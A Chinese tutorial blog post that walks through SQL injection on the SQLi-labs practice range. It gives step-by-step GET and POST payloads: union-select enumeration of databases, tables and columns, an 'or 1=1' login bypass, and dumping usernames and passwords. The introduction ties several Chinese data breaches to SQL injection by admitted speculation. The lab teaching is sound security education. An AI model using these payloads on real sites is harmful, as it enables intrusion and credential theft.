你们公司的网站真的安全吗?快用我的SQL注入脚本测试下吧。


1. 2020年招商银行数据泄露事件

  • 事件概述:2020年,有消息称招商银行的用户数据在暗网中被公开售卖,涉及大量用户的个人信息和银行账户数据。
  • 原因:虽然具体细节未被官方披露,但据业内分析,此次事件可能与招商银行某些业务系统的SQL注入漏洞有关。攻击者通过SQL注入手段获取了数据库中的敏感信息。

2. 2018年华住集团数据泄露事件

  • 事件概述:华住集团旗下多个酒店的开房记录、个人身份信息、注册资料等超过5亿条数据在暗网上被售卖。
  • 原因:虽然官方没有确认具体的技术细节,但有专家指出,此类大规模数据泄露通常可能与系统存在的SQL注入漏洞等安全缺陷有关。

3. 2017年饿了么平台数据泄露事件

  • 事件概述:2017年,饿了么外卖平台的用户数据在暗网中被出售,涉及大量用户的个人信息。
  • 原因:业内推测此次数据泄露可能与存在SQL注入漏洞有关。饿了么官方未具体披露技术原因,但SQL注入攻击是此类平台常见的安全问题。

4. 2023年某省份教育系统数据泄露

  • 事件概述:2023年,某省份教育系统发生数据泄露事件,学生的个人信息、成绩单等数据被泄露到网上。
  • 原因:虽然具体技术原因未被公开,但有分析认为,SQL注入可能是导致数据泄露的原因之一,因为许多教育系统的安全防护往往较为薄弱,容易被利用。


SQL注入(SQL Injection)是一种常见且危险的漏洞类型,攻击者可以通过这种漏洞获取数据库中的敏感信息,甚至对数据库进行增删改查操作。在国内发生的多起重大数据泄露事件中,SQL注入漏洞往往是攻击者入侵系统并获取数据的主要手段之一。

SQL注入原理可描述为通过用户可控参数中注入SQL语法,在程序员未对输入数据合法性做判断或过滤不严情况下,破坏原有SQL结构,达到编写程序时意料之外的结果。上篇文章已经搭建好了SQLi-labs靶场,一共包含65关,适用于GET和POST场景。接下来让我们开始SQL注入实战!


一、实战准备


安全测试靶场:SQLi-labs


工具:Firefox、Firefox插件HackBar、burpsuite或任意抓包工具


二、SQL注入思路


1、判断是否存在SQL注入漏洞

2、猜解SQL查询语句中的字段数

3、获取当前数据库

4、获取数据库中的表

5、获取表中的字段名

6、获取指定字段的数据


三、SQL注入实战-Get场景


进入SQLi-labs的Less-1关,输入id的值


1、id=1' ,发起请求,返回SQL语法错误


2a7dafa220e45dc67881d6e6db0b572f.jpeg


2、id = 1'--+;程序未对输入内容做限制, 语句执行成功,页面返回了id=1的用户信息,存在SQL注入漏洞


3442ef90ce06202fd578393d1e386f68.jpeg


3、判断当前表的字段数


select * from users where id='1' order by 1; 该语句中order by 1为按第1列的数据进行排序。


输入 id=1' order by 3 #,回显数据正常,表示当前查询表存在第3列数据。


fb0fa277077fdf4d7b18c1947021098e.jpeg


输入 id=1' order by 4 #,报错!不存在第4列,说明当前查询的用户表数据一共只有3列!


231dfb2053879f96444a4e43ea1d1041.jpeg


4、获取数据库库名


使用union联合查询,让union前面的select语句查询为空,然后采用后面的select语句查询并输出。


id=' union select 1,2,group_concat(schema_name) from information_schema.schemata #; 可回显所有的数据库库名。


d954f132c3aac5948a496137502f0bdc.jpeg


5、获取数据库的表名


id=' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' #;获取到security库的所有表名。


8a7fd62465e0604ad250d31f3bd550bd.jpeg


6、获取表中的字段名


id=' union select 1,group_concat(column_name) from information_schema.columns where table_name='users' #;其中,如果不支持'users'单引号,可转为十六进制,7573657273为users的十六进制。得到users表的所有字段。


d14219303d85dc6b9e1c6d3fb2f5d4b2.jpeg


7、获取表中需要的数据


id=' union select 1,2,group_concat(concat_ws('~',username,password)) from security.users #;


可以得到users表中所有用户和密码信息。其中7e是~的十六进制表示。


128407710bbca8425c62f8a4ee57f236.jpeg


四、SQL注入实战-POST场景


进入SQLi-labs的Less-11关,输入Username、Password。


1、判断是否存在sql注入漏洞


在username中填写’,password中随便写,出现sql语法错误。或者通过bp截获到请求信息,uname=’ & passwd=1&submit=Submit。


e1c591a6768acb887bcfe92d109a288a.jpeg


直接在username中填写admin’or 1=1#,password随便写,此时登录成功,Username存在SQL注入漏洞。Password同理。


56beeaf9b859995f5fd16c71b400e4aa.jpeg


2、判断当前查询表的字段数


通过burpsuite截获数据(用任意抓包工具都可),并发送到Repeater,修改数据并进行重发:


ce4f6c7998fb2e4ff28f3dfefe169f6b.jpeg


在burpsuite中分别修改数据,进行后续步骤的操作:


uname=admin’order by 3#&passwd=a&submit=Submit 或者是使用uname=admin&passwd=a’order by 2# &submit=Submit 同样可以进行判断,最后得出一共有两列。


7e9376497e2f944930619db861e90758.jpeg


b100140d0fe29b7a6066b3b78b3b6830.jpeg


3、获取当前数据库名


uname=a&passwd=a’union select database(),2 # &submit=Submit查询到当前的数据库为security,或者使用:uname=a’ union select database(),2 # & passwd=a&submit=Submit均可查询到当前数据库,当然也可以查询其它信息。


f136fa7f34d758e5cbb421bfb0b1f227.jpeg


4、获取当前数据库下的表名


uname=a' union select 1, (select group_concat(table_name) from information_schema.tables where table_schema='security')# &passwd=a&submit=Submit可以得到security数据库中所有的表信息


88e5ca1a5331aa01a905e25511c7650d.jpeg


5、获取表中字段名


uname=a%27 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'#&passwd=a&submit=Submit 可以得到users表所有字段值信息,为id,username、password


4a6d16e6cfe2a9477b586a491dfbaf85.jpeg


6、获取表中数据


uname=a%27 union select 1,group_concat(concat_ws('~',username,password)) from security.users#&passwd=a&submit=Submit,可以得到users表所有用户及密码信息。


fe6d024a0eb522a3c5c83dfd6452fd38.jpeg


当然,以上基于sqli-labs的注入实操只是入门级,感兴趣的同学可以继续钻研其他关卡!


学无止境,行以致远!

另外请大家注意,未经授权允许,不要随意去第三方网站(包括不限于别人的网站,政府门户网站...)去做安全测试哈,所有展开的安全测试行为都应严格遵循相关的网络安全法。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值